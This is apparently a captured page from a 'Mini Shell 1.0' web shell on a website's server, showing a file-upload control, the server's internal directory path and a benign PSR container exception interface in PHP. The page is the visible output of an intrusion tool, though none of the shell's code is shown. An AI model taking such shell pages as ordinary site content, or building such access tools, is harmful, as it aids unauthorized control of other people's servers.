HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /home/lapieza/vendor/psr/container/src/
Upload File :
Current File : //home/lapieza/vendor/psr/container/src/NotFoundExceptionInterface.php
<?php

namespace Psr\Container;

/**
 * No entry was found in the container.
 */
interface NotFoundExceptionInterface extends ContainerExceptionInterface
{
}